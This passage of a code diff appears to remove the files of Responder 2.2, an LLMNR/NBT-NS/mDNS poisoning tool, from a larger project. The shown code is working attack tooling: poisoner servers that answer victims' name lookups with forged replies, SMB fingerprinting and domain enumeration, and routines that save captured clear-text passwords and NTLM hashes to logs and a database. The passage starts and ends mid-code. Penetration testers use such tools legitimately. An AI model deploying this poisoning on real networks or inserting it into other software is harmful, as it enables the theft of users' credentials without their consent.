ipaddr = int(''.join([ '%02x' % int(x) for x in ip.split('.') ]), 16)
netstr, bits = net.split('/')
netaddr = int(''.join([ '%02x' % int(x) for x in netstr.split('.') ]), 16)
mask = (0xffffffff << (32 - int(bits))) & 0xffffffff
return (ipaddr & mask) == (netaddr & mask)
def IsICMPRedirectPlausible(IP):
dnsip = []
for line in file('/etc/resolv.conf', 'r'):
ip = line.split()
if len(ip) < 2:
continue
if ip[0] == 'nameserver':
dnsip.extend(ip[1:])
for x in dnsip:
if x !="127.0.0.1" and IsOnTheSameSubnet(x,IP) == False:
settings.Config.AnalyzeLogger.warning("[Analyze mode: ICMP] You can ICMP Redirect on this network.")
settings.Config.AnalyzeLogger.warning("[Analyze mode: ICMP] This workstation (%s) is not on the same subnet than the DNS server (%s)." % (IP, x))
else:
pass
if settings.Config.AnalyzeMode:
IsICMPRedirectPlausible(settings.Config.Bind_To)
# LLMNR Server class
class LLMNRServer(BaseRequestHandler):
def handle(self):
data, soc = self.request
Name = Parse_LLMNR_Name(data)
# Break out if we don't want to respond to this host
if RespondToThisHost(self.client_address[0], Name) is not True:
return None
if data[2:4] == "\x00\x00" and Parse_IPV6_Addr(data):
if settings.Config.Finger_On_Off:
Finger = fingerprint.RunSmbFinger((self.client_address[0], 445))
else:
Finger = None
# Analyze Mode
if settings.Config.AnalyzeMode:
settings.Config.AnalyzeLogger.warning("{} [Analyze mode: LLMNR] Request for {}, ignoring".format(self.client_address[0], Name))
# Poisoning Mode
else:
Buffer = LLMNR_Ans(Tid=data[0:2], QuestionName=Name, AnswerName=Name)
Buffer.calculate()
soc.sendto(str(Buffer), self.client_address)
settings.Config.PoisonersLogger.warning("{} [LLMNR] Poisoned request for name {}".format(self.client_address[0], Name))
if Finger is not None:
settings.Config.ResponderLogger.info("[FINGER] OS Version: {}".format(Finger[0]))
settings.Config.ResponderLogger.info("[FINGER] Client Version: {}".format(Finger[1]))

View file

@ -1,102 +0,0 @@
#!/usr/bin/env python
# This file is part of Responder
# Original work by Laurent Gaffie - Trustwave Holdings
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import struct
import core.responder.settings as settings
import socket
import threading
from SocketServer import BaseRequestHandler, ThreadingMixIn, UDPServer
from core.responder.packets import MDNS_Ans
from core.responder.utils import *
def start():
try:
server = ThreadingUDPMDNSServer(('', 5353), MDNSServer)
t = threading.Thread(name='MDNS', target=server.serve_forever)
t.setDaemon(True)
t.start()
except Exception as e:
print "Error starting MDNS server on port 5353: {}".format(e)
class ThreadingUDPMDNSServer(ThreadingMixIn, UDPServer):
allow_reuse_address = 1
def server_bind(self):
MADDR = "224.0.0.251"
self.socket.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR, 1)
self.socket.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 255)
Join = self.socket.setsockopt(socket.IPPROTO_IP,socket.IP_ADD_MEMBERSHIP, socket.inet_aton(MADDR) + settings.Config.IP_aton)
if OsInterfaceIsSupported():
try:
self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Bind_To+'\0')
except:
pass
UDPServer.server_bind(self)
def Parse_MDNS_Name(data):
try:
data = data[12:]
NameLen = struct.unpack('>B',data[0])[0]
Name = data[1:1+NameLen]
NameLen_ = struct.unpack('>B',data[1+NameLen])[0]
Name_ = data[1+NameLen:1+NameLen+NameLen_+1]
return Name+'.'+Name_
except IndexError:
return None
def Poisoned_MDNS_Name(data):
data = data[12:]
Name = data[:len(data)-5]
return Name
class MDNSServer(BaseRequestHandler):
def handle(self):
MADDR = "224.0.0.251"
MPORT = 5353
data, soc = self.request
Request_Name = Parse_MDNS_Name(data)
# Break out if we don't want to respond to this host
if (not Request_Name) or (RespondToThisHost(self.client_address[0], Request_Name) is not True):
return None
try:
# Analyze Mode
if settings.Config.AnalyzeMode:
if Parse_IPV6_Addr(data):
settings.Config.AnalyzeLogger.warning('{} [Analyze mode: MDNS] Request for {}, ignoring'.format(self.client_address[0], Request_Name))
# Poisoning Mode
else:
if Parse_IPV6_Addr(data):
Poisoned_Name = Poisoned_MDNS_Name(data)
Buffer = MDNS_Ans(AnswerName = Poisoned_Name, IP=socket.inet_aton(settings.Config.Bind_To))
Buffer.calculate()
soc.sendto(str(Buffer), (MADDR, MPORT))
settings.Config.PoisonersLogger.warning('{} [MDNS] Poisoned answer for name {}'.format(self.client_address[0], Request_Name))
except Exception:
raise

View file

@ -1,99 +0,0 @@
#!/usr/bin/env python
# This file is part of Responder
# Original work by Laurent Gaffie - Trustwave Holdings
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import socket
import threading
import core.responder.settings as settings
import core.responder.fingerprint as fingerprint
from core.responder.packets import NBT_Ans
from SocketServer import BaseRequestHandler, ThreadingMixIn, UDPServer
from core.responder.utils import *
def start():
try:
server = ThreadingUDPServer(('', 137), NBTNSServer)
t = threading.Thread(name='NBTNS', target=server.serve_forever)
t.setDaemon(True)
t.start()
except Exception as e:
print "Error starting NBTNS server on port 137: {}".format(e)
class ThreadingUDPServer(ThreadingMixIn, UDPServer):
allow_reuse_address = 1
def server_bind(self):
if OsInterfaceIsSupported():
try:
self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Bind_To+'\0')
except:
pass
UDPServer.server_bind(self)
# Define what are we answering to.
def Validate_NBT_NS(data):
if settings.Config.AnalyzeMode:
return False
if NBT_NS_Role(data[43:46]) == "File Server":
return True
if settings.Config.NBTNSDomain == True:
if NBT_NS_Role(data[43:46]) == "Domain Controller":
return True
if settings.Config.Wredirect == True:
if NBT_NS_Role(data[43:46]) == "Workstation/Redirector":
return True
else:
return False
# NBT_NS Server class.
class NBTNSServer(BaseRequestHandler):
def handle(self):
data, socket = self.request
Name = Decode_Name(data[13:45])
# Break out if we don't want to respond to this host
if RespondToThisHost(self.client_address[0], Name) is not True:
return None
if data[2:4] == "\x01\x10":
if settings.Config.Finger_On_Off:
Finger = fingerprint.RunSmbFinger((self.client_address[0],445))
else:
Finger = None
# Analyze Mode
if settings.Config.AnalyzeMode:
settings.Config.AnalyzeLogger.warning("{} [Analyze mode: NBT-NS] Request for {}, ignoring".format(self.client_address[0], Name))
# Poisoning Mode
else:
Buffer = NBT_Ans()
Buffer.calculate(data)
socket.sendto(str(Buffer), self.client_address)
settings.Config.PoisonersLogger.warning("{} [NBT-NS] Poisoned answer for name {} (service: {})" .format(self.client_address[0], Name, NBT_NS_Role(data[43:46])))
if Finger is not None:
settings.Config.ResponderLogger.info("[FINGER] OS Version : {}".format(Finger[0]))
settings.Config.ResponderLogger.info("[FINGER] Client Version : {}".format(Finger[1]))

View file

@ -1,68 +0,0 @@
#!/usr/bin/env python
# This file is part of Responder
# Original work by Laurent Gaffie - Trustwave Holdings
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import re
import sys
import socket
import struct
import string
import logging
from utils import *
from odict import OrderedDict
from packets import SMBHeader, SMBNego, SMBNegoFingerData, SMBSessionFingerData
def OsNameClientVersion(data):
try:
length = struct.unpack('<H',data[43:45])[0]
pack = tuple(data[47+length:].split('\x00\x00\x00'))[:2]
OsVersion, ClientVersion = tuple([e.replace('\x00','') for e in data[47+length:].split('\x00\x00\x00')[:2]])
return OsVersion, ClientVersion
except:
return "Could not fingerprint Os version.", "Could not fingerprint LanManager Client version"
def RunSmbFinger(host):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(host)
s.settimeout(0.7)
h = SMBHeader(cmd="\x72",flag1="\x18",flag2="\x53\xc8")
n = SMBNego(data = SMBNegoFingerData())
n.calculate()
Packet = str(h)+str(n)
Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
s.send(Buffer)
data = s.recv(2048)
if data[8:10] == "\x72\x00":
Header = SMBHeader(cmd="\x73",flag1="\x18",flag2="\x17\xc8",uid="\x00\x00")
Body = SMBSessionFingerData()
Body.calculate()
Packet = str(Header)+str(Body)
Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
s.send(Buffer)
data = s.recv(2048)
if data[8:10] == "\x73\x16":
return OsNameClientVersion(data)
except:
settings.Config.AnalyzeLogger.warning("Fingerprint failed for host: {}".format(host))
return None

View file

@ -1,117 +0,0 @@
#!/usr/bin/env python
# This file is part of Responder
# Original work by Laurent Gaffie - Trustwave Holdings
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from UserDict import DictMixin
class OrderedDict(dict, DictMixin):
def __init__(self, *args, **kwds):
if len(args) > 1:
raise TypeError('expected at most 1 arguments, got %d' % len(args))
try:
self.__end
except AttributeError:
self.clear()
self.update(*args, **kwds)
def clear(self):
self.__end = end = []
end += [None, end, end]
self.__map = {}
dict.clear(self)
def __setitem__(self, key, value):
if key not in self:
end = self.__end
curr = end[1]
curr[2] = end[1] = self.__map[key] = [key, curr, end]
dict.__setitem__(self, key, value)
def __delitem__(self, key):
dict.__delitem__(self, key)
key, prev, next = self.__map.pop(key)
prev[2] = next
next[1] = prev
def __iter__(self):
end = self.__end
curr = end[2]
while curr is not end:
yield curr[0]
curr = curr[2]
def __reversed__(self):
end = self.__end
curr = end[1]
while curr is not end:
yield curr[0]
curr = curr[1]
def popitem(self, last=True):
if not self:
raise KeyError('dictionary is empty')
if last:
key = reversed(self).next()
else:
key = iter(self).next()
value = self.pop(key)
return key, value
def __reduce__(self):
items = [[k, self[k]] for k in self]
tmp = self.__map, self.__end
del self.__map, self.__end
inst_dict = vars(self).copy()
self.__map, self.__end = tmp
if inst_dict:
return (self.__class__, (items,), inst_dict)
return self.__class__, (items,)
def keys(self):
return list(self)
setdefault = DictMixin.setdefault
update = DictMixin.update
pop = DictMixin.pop
values = DictMixin.values
items = DictMixin.items
iterkeys = DictMixin.iterkeys
itervalues = DictMixin.itervalues
iteritems = DictMixin.iteritems
def __repr__(self):
if not self:
return '%s()' % (self.__class__.__name__,)
return '%s(%r)' % (self.__class__.__name__, self.items())
def copy(self):
return self.__class__(self)
@classmethod
def fromkeys(cls, iterable, value=None):
d = cls()
for key in iterable:
d[key] = value
return d
def __eq__(self, other):
if isinstance(other, OrderedDict):
return len(self)==len(other) and \
min(p==q for p, q in zip(self.items(), other.items()))
return dict.__eq__(self, other)
def __ne__(self, other):
return not self == other

File diff suppressed because it is too large Load diff

View file

@ -1,181 +0,0 @@
#!/usr/bin/env python
# This file is part of Responder
# Original work by Laurent Gaffie - Trustwave Holdings
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import os
import sys
import socket
import utils
import logging
from core.logger import logger
from core.configwatcher import ConfigWatcher
__version__ = 'Responder 2.2'
class Settings(ConfigWatcher):
def __init__(self):
self.ResponderPATH = os.path.dirname(__file__)
self.Bind_To = '0.0.0.0'
def __str__(self):
ret = 'Settings class:\n'
for attr in dir(self):
value = str(getattr(self, attr)).strip()
ret += " Settings.%s = %s\n" % (attr, value)
return ret
def toBool(self, str):
return True if str.upper() == 'ON' else False
def ExpandIPRanges(self):
def expand_ranges(lst):
ret = []
for l in lst:
tab = l.split('.')
x = {}
i = 0
for byte in tab:
if '-' not in byte:
x[i] = x[i+1] = int(byte)
else:
b = byte.split('-')
x[i] = int(b[0])
x[i+1] = int(b[1])
i += 2
for a in range(x[0], x[1]+1):
for b in range(x[2], x[3]+1):
for c in range(x[4], x[5]+1):
for d in range(x[6], x[7]+1):
ret.append('%d.%d.%d.%d' % (a, b, c, d))
return ret
self.RespondTo = expand_ranges(self.RespondTo)
self.DontRespondTo = expand_ranges(self.DontRespondTo)
def populate(self, options):
# Servers
self.SSL_On_Off = self.toBool(self.config['Responder']['HTTPS'])
self.SQL_On_Off = self.toBool(self.config['Responder']['SQL'])
self.FTP_On_Off = self.toBool(self.config['Responder']['FTP'])
self.POP_On_Off = self.toBool(self.config['Responder']['POP'])
self.IMAP_On_Off = self.toBool(self.config['Responder']['IMAP'])
self.SMTP_On_Off = self.toBool(self.config['Responder']['SMTP'])
self.LDAP_On_Off = self.toBool(self.config['Responder']['LDAP'])
self.Krb_On_Off = self.toBool(self.config['Responder']['Kerberos'])
# Db File
self.DatabaseFile = './logs/responder/Responder.db'
# Log Files
self.LogDir = './logs/responder'
if not os.path.exists(self.LogDir):
os.mkdir(self.LogDir)
self.SessionLogFile = os.path.join(self.LogDir, 'Responder-Session.log')
self.PoisonersLogFile = os.path.join(self.LogDir, 'Poisoners-Session.log')
self.AnalyzeLogFile = os.path.join(self.LogDir, 'Analyzer-Session.log')
self.FTPLog = os.path.join(self.LogDir, 'FTP-Clear-Text-Password-%s.txt')
self.IMAPLog = os.path.join(self.LogDir, 'IMAP-Clear-Text-Password-%s.txt')
self.POP3Log = os.path.join(self.LogDir, 'POP3-Clear-Text-Password-%s.txt')
self.HTTPBasicLog = os.path.join(self.LogDir, 'HTTP-Clear-Text-Password-%s.txt')
self.LDAPClearLog = os.path.join(self.LogDir, 'LDAP-Clear-Text-Password-%s.txt')
self.SMBClearLog = os.path.join(self.LogDir, 'SMB-Clear-Text-Password-%s.txt')
self.SMTPClearLog = os.path.join(self.LogDir, 'SMTP-Clear-Text-Password-%s.txt')
self.MSSQLClearLog = os.path.join(self.LogDir, 'MSSQL-Clear-Text-Password-%s.txt')
self.LDAPNTLMv1Log = os.path.join(self.LogDir, 'LDAP-NTLMv1-Client-%s.txt')
self.HTTPNTLMv1Log = os.path.join(self.LogDir, 'HTTP-NTLMv1-Client-%s.txt')
self.HTTPNTLMv2Log = os.path.join(self.LogDir, 'HTTP-NTLMv2-Client-%s.txt')
self.KerberosLog = os.path.join(self.LogDir, 'MSKerberos-Client-%s.txt')
self.MSSQLNTLMv1Log = os.path.join(self.LogDir, 'MSSQL-NTLMv1-Client-%s.txt')
self.MSSQLNTLMv2Log = os.path.join(self.LogDir, 'MSSQL-NTLMv2-Client-%s.txt')
self.SMBNTLMv1Log = os.path.join(self.LogDir, 'SMB-NTLMv1-Client-%s.txt')
self.SMBNTLMv2Log = os.path.join(self.LogDir, 'SMB-NTLMv2-Client-%s.txt')
self.SMBNTLMSSPv1Log = os.path.join(self.LogDir, 'SMB-NTLMSSPv1-Client-%s.txt')
self.SMBNTLMSSPv2Log = os.path.join(self.LogDir, 'SMB-NTLMSSPv2-Client-%s.txt')
# HTTP Options
self.Serve_Exe = self.toBool(self.config['Responder']['HTTP Server']['Serve-Exe'])
self.Serve_Always = self.toBool(self.config['Responder']['HTTP Server']['Serve-Always'])
self.Serve_Html = self.toBool(self.config['Responder']['HTTP Server']['Serve-Html'])
self.Html_Filename = self.config['Responder']['HTTP Server']['HtmlFilename']
self.HtmlToInject = self.config['Responder']['HTTP Server']['HTMLToInject']
self.Exe_Filename = self.config['Responder']['HTTP Server']['ExeFilename']
self.Exe_DlName = self.config['Responder']['HTTP Server']['ExeDownloadName']
self.WPAD_Script = self.config['Responder']['HTTP Server']['WPADScript']
if not os.path.exists(self.Html_Filename):
print "Warning: %s: file not found" % self.Html_Filename
if not os.path.exists(self.Exe_Filename):
print "Warning: %s: file not found" % self.Exe_Filename
# SSL Options
self.SSLKey = self.config['Responder']['HTTPS Server']['SSLKey']
self.SSLCert = self.config['Responder']['HTTPS Server']['SSLCert']
# Respond to hosts
self.RespondTo = filter(None, [x.upper().strip() for x in self.config['Responder']['RespondTo'].strip().split(',')])
self.RespondToName = filter(None, [x.upper().strip() for x in self.config['Responder']['RespondToName'].strip().split(',')])
self.DontRespondTo = filter(None, [x.upper().strip() for x in self.config['Responder']['DontRespondTo'].strip().split(',')])
self.DontRespondToName = filter(None, [x.upper().strip() for x in self.config['Responder']['DontRespondToName'].strip().split(',')])
# CLI options
self.Interface = options.interface
self.Force_WPAD_Auth = options.forcewpadauth
self.LM_On_Off = options.lm
self.WPAD_On_Off = options.wpad
self.Wredirect = options.wredir
self.NBTNSDomain = options.nbtns
self.Basic = options.basic
self.Finger_On_Off = options.finger
self.AnalyzeMode = options.analyze
#self.Upstream_Proxy = options.Upstream_Proxy
self.Verbose = True
if options.log_level == 'debug':
self.Verbose = True
self.Bind_To = utils.FindLocalIP(self.Interface)
self.IP_aton = socket.inet_aton(self.Bind_To)
self.Os_version = sys.platform
# Set up Challenge
self.NumChal = self.config['Responder']['Challenge']
if len(self.NumChal) is not 16:
print "The challenge must be exactly 16 chars long.\nExample: 1122334455667788"
sys.exit(-1)
self.Challenge = ""
for i in range(0, len(self.NumChal),2):
self.Challenge += self.NumChal[i:i+2].decode("hex")
# Set up logging
formatter = logging.Formatter("%(asctime)s %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
self.ResponderLogger = logger().setup_logger("Responder", formatter, self.SessionLogFile)
#logging.warning('Responder Started: {}'.format(self.CommandLine))
#logging.warning('Responder Config: {}'.format(self))
self.PoisonersLogger = logger().setup_logger("Poison log", formatter, self.PoisonersLogFile)
self.AnalyzeLogger = logger().setup_logger("Analyze Log", formatter, self.AnalyzeLogFile)
Config = Settings()

View file

@ -1,247 +0,0 @@
#!/usr/bin/env python
# This file is part of Responder
# Original work by Laurent Gaffie - Trustwave Holdings
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import os
import sys
import re
import logging
import socket
import time
import settings
import sqlite3
def RespondToThisIP(ClientIp):
if ClientIp.startswith('127.0.0.'):
return False
if len(settings.Config.RespondTo) and ClientIp not in settings.Config.RespondTo:
return False
if ClientIp in settings.Config.RespondTo or settings.Config.RespondTo == []:
if ClientIp not in settings.Config.DontRespondTo:
return True
return False
def RespondToThisName(Name):
if len(settings.Config.RespondToName) and Name.upper() not in settings.Config.RespondToName:
return False
if Name.upper() in settings.Config.RespondToName or settings.Config.RespondToName == []:
if Name.upper() not in settings.Config.DontRespondToName:
return True
return False
def RespondToThisHost(ClientIp, Name):
return (RespondToThisIP(ClientIp) and RespondToThisName(Name))
def IsOsX():
return True if settings.Config.Os_version == "darwin" else False
def OsInterfaceIsSupported():
if settings.Config.Interface != "Not set":
return False if IsOsX() else True
else:
return False
def FindLocalIP(Iface):
if Iface == 'ALL':
return '0.0.0.0'
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.setsockopt(socket.SOL_SOCKET, 25, Iface+'\0')
s.connect(("127.0.0.1",9))#RFC 863
ret = s.getsockname()[0]
s.close()
return ret
except socket.error:
sys.exit(-1)
# Function used to write captured hashs to a file.
def WriteData(outfile, data, user):
settings.Config.ResponderLogger.info("[*] Captured Hash: %s" % data)
if os.path.isfile(outfile) == False:
with open(outfile,"w") as outf:
outf.write(data)
outf.write("\n")
outf.close()
else:
with open(outfile,"r") as filestr:
if re.search(user.encode('hex'), filestr.read().encode('hex')):
filestr.close()
return False
if re.search(re.escape("$"), user):
filestr.close()
return False
with open(outfile,"a") as outf2:
outf2.write(data)
outf2.write("\n")
outf2.close()
def SaveToDb(result):
# Creating the DB if it doesn't exist
if not os.path.exists(settings.Config.DatabaseFile):
cursor = sqlite3.connect(settings.Config.DatabaseFile)
cursor.execute('CREATE TABLE responder (timestamp varchar(32), module varchar(16), type varchar(16), client varchar(32), hostname varchar(32), user varchar(32), cleartext varchar(128), hash varchar(512), fullhash varchar(512))')
cursor.commit()
cursor.close()
for k in [ 'module', 'type', 'client', 'hostname', 'user', 'cleartext', 'hash', 'fullhash' ]:
if not k in result:
result[k] = ''
if len(result['user']) < 2:
return
if len(result['cleartext']):
fname = '%s-%s-ClearText-%s.txt' % (result['module'], result['type'], result['client'])
else:
fname = '%s-%s-%s.txt' % (result['module'], result['type'], result['client'])
timestamp = time.strftime("%d-%m-%Y %H:%M:%S")
logfile = os.path.join('./logs/responder', fname)
cursor = sqlite3.connect(settings.Config.DatabaseFile)
res = cursor.execute("SELECT COUNT(*) AS count FROM responder WHERE module=? AND type=? AND LOWER(user)=LOWER(?)", (result['module'], result['type'], result['user']))
(count,) = res.fetchone()
if count == 0:
# Write JtR-style hash string to file
with open(logfile,"a") as outf:
outf.write(result['fullhash'])
outf.write("\n")
outf.close()
# Update database
cursor.execute("INSERT INTO responder VALUES(?, ?, ?, ?, ?, ?, ?, ?, ?)", (timestamp, result['module'], result['type'], result['client'], result['hostname'], result['user'], result['cleartext'], result['hash'], result['fullhash']))
cursor.commit()
cursor.close()
# Print output
if count == 0 or settings.Config.Verbose:
if len(result['client']):
settings.Config.ResponderLogger.info("[%s] %s Client : %s" % (result['module'], result['type'], result['client']))
if len(result['hostname']):
settings.Config.ResponderLogger.info("[%s] %s Hostname : %s" % (result['module'], result['type'], result['hostname']))
if len(result['user']):
settings.Config.ResponderLogger.info("[%s] %s Username : %s" % (result['module'], result['type'], result['user']))
# By order of priority, print cleartext, fullhash, or hash
if len(result['cleartext']):
settings.Config.ResponderLogger.info("[%s] %s Password : %s" % (result['module'], result['type'], result['cleartext']))
elif len(result['fullhash']):
settings.Config.ResponderLogger.info("[%s] %s Hash : %s" % (result['module'], result['type'], result['fullhash']))
elif len(result['hash']):
settings.Config.ResponderLogger.info("[%s] %s Hash : %s" % (result['module'], result['type'], result['hash']))
else:
settings.Config.PoisonersLogger.warning('Skipping previously captured hash for %s' % result['user'])
def Parse_IPV6_Addr(data):
if data[len(data)-4:len(data)][1] =="\x1c":
return False
elif data[len(data)-4:len(data)] == "\x00\x01\x00\x01":
return True
elif data[len(data)-4:len(data)] == "\x00\xff\x00\x01":
return True
else:
return False
def Decode_Name(nbname):
#From http://code.google.com/p/dpkt/ with author's permission.
try:
from string import printable
if len(nbname) != 32:
return nbname
l = []
for i in range(0, 32, 2):
l.append(chr(((ord(nbname[i]) - 0x41) << 4) | ((ord(nbname[i+1]) - 0x41) & 0xf)))
return filter(lambda x: x in printable, ''.join(l).split('\x00', 1)[0].replace(' ', ''))
except:
return "Illegal NetBIOS name"
def NBT_NS_Role(data):
Role = {
"\x41\x41\x00":"Workstation/Redirector",
"\x42\x4c\x00":"Domain Master Browser",
"\x42\x4d\x00":"Domain Controller",
"\x42\x4e\x00":"Local Master Browser",
"\x42\x4f\x00":"Browser Election",
"\x43\x41\x00":"File Server",
"\x41\x42\x00":"Browser",
}
return Role[data] if data in Role else "Service not known"
# Useful for debugging
def hexdump(src, l=0x16):
res = []
sep = '.'
src = str(src)
for i in range(0, len(src), l):
s = src[i:i+l]
hexa = ''
for h in range(0,len(s)):
if h == l/2:
hexa += ' '
h = s[h]
if not isinstance(h, int):
h = ord(h)
h = hex(h).replace('0x','')
if len(h) == 1:
h = '0'+h
hexa += h + ' '
hexa = hexa.strip(' ')
text = ''
for c in s:
if not isinstance(c, int):
c = ord(c)
if 0x20 <= c < 0x7F:
text += chr(c)
else:
text += sep
res.append(('%08X: %-'+str(l*(2+1)+1)+'s |%s|') % (i, hexa, text))
return '\n'.join(res)

View file

@ -1,224 +0,0 @@
#!/usr/bin/env python
# This file is part of Responder
# Original work by Laurent Gaffie - Trustwave Holdings
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import socket
import struct
import threading
import core.responder.settings as settings
from core.responder.packets import SMBHeader, SMBNegoData, SMBSessionData, SMBTreeConnectData, RAPNetServerEnum3Data, SMBTransRAPData
from SocketServer import BaseRequestHandler, ThreadingMixIn, UDPServer
from core.responder.utils import *
def start():
try:
server = ThreadingUDPServer(('', 138), Browser1)
t = threading.Thread(name='Browser', target=server.serve_forever)
t.setDaemon(True)
t.start()
except Exception as e:
print "Error starting Browser server on port 138: {}".format(e)
class ThreadingUDPServer(ThreadingMixIn, UDPServer):
def server_bind(self):
if OsInterfaceIsSupported():
try:
self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Bind_To+'\0')
except:
pass
UDPServer.server_bind(self)
def WorkstationFingerPrint(data):
Role = {
"\x04\x00" :"Windows 95",
"\x04\x10" :"Windows 98",
"\x04\x90" :"Windows ME",
"\x05\x00" :"Windows 2000",
"\x05\x00" :"Windows XP",
"\x05\x02" :"Windows 2003",
"\x06\x00" :"Windows Vista/Server 2008",
"\x06\x01" :"Windows 7/Server 2008R2",
}
return Role[data] if data in Role else "Unknown"
def RequestType(data):
Type = {
"\x01": 'Host Announcement',
"\x02": 'Request Announcement',
"\x08": 'Browser Election',
"\x09": 'Get Backup List Request',
"\x0a": 'Get Backup List Response',
"\x0b": 'Become Backup Browser',
"\x0c": 'Domain/Workgroup Announcement',
"\x0d": 'Master Announcement',
"\x0e": 'Reset Browser State Announcement',
"\x0f": 'Local Master Announcement',
}
return Type[data] if data in Type else "Unknown"
def PrintServerName(data, entries):
if entries > 0:
entrieslen = 26*entries
chunks, chunk_size = len(data[:entrieslen]), entrieslen/entries
ServerName = [data[i:i+chunk_size] for i in range(0, chunks, chunk_size)]
l = []
for x in ServerName:
FP = WorkstationFingerPrint(x[16:18])
Name = x[:16].replace('\x00', '')
if FP:
l.append(Name + ' (%s)' % FP)
else:
l.append(Name)
return l
return None
def ParsePacket(Payload):
PayloadOffset = struct.unpack('<H',Payload[51:53])[0]
StatusCode = Payload[PayloadOffset-4:PayloadOffset-2]
if StatusCode == "\x00\x00":
EntriesNum = struct.unpack('<H',Payload[PayloadOffset:PayloadOffset+2])[0]
return PrintServerName(Payload[PayloadOffset+4:], EntriesNum)
else:
return None
def RAPThisDomain(Client,Domain):
PDC = RapFinger(Client,Domain,"\x00\x00\x00\x80")
if PDC is not None:
settings.Config.ResponderLogger.info("[LANMAN] Detected Domains: %s" % ', '.join(PDC))
SQL = RapFinger(Client,Domain,"\x04\x00\x00\x00")
if SQL is not None:
settings.Config.ResponderLogger.info("[LANMAN] Detected SQL Servers on domain %s: %s" % (Domain, ', '.join(SQL)))
WKST = RapFinger(Client,Domain,"\xff\xff\xff\xff")
if WKST is not None:
settings.Config.ResponderLogger.info("[LANMAN] Detected Workstations/Servers on domain %s: %s" % (Domain, ', '.join(WKST)))
def RapFinger(Host, Domain, Type):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((Host,445))
s.settimeout(0.3)
Header = SMBHeader(cmd="\x72",mid="\x01\x00")
Body = SMBNegoData()
Body.calculate()
Packet = str(Header)+str(Body)
Buffer = struct.pack(">i", len(''.join(Packet))) + Packet
s.send(Buffer)
data = s.recv(1024)
# Session Setup AndX Request, Anonymous.
if data[8:10] == "\x72\x00":
Header = SMBHeader(cmd="\x73",mid="\x02\x00")
Body = SMBSessionData()
Body.calculate()
Packet = str(Header)+str(Body)
Buffer = struct.pack(">i", len(''.join(Packet))) + Packet
s.send(Buffer)
data = s.recv(1024)
# Tree Connect IPC$.
if data[8:10] == "\x73\x00":
Header = SMBHeader(cmd="\x75",flag1="\x08", flag2="\x01\x00",uid=data[32:34],mid="\x03\x00")
Body = SMBTreeConnectData(Path="\\\\"+Host+"\\IPC$")
Body.calculate()
Packet = str(Header)+str(Body)
Buffer = struct.pack(">i", len(''.join(Packet))) + Packet
s.send(Buffer)
data = s.recv(1024)
# Rap ServerEnum.
if data[8:10] == "\x75\x00":
Header = SMBHeader(cmd="\x25",flag1="\x08", flag2="\x01\xc8",uid=data[32:34],tid=data[28:30],pid=data[30:32],mid="\x04\x00")
Body = SMBTransRAPData(Data=RAPNetServerEnum3Data(ServerType=Type,DetailLevel="\x01\x00",TargetDomain=Domain))
Body.calculate()
Packet = str(Header)+str(Body)
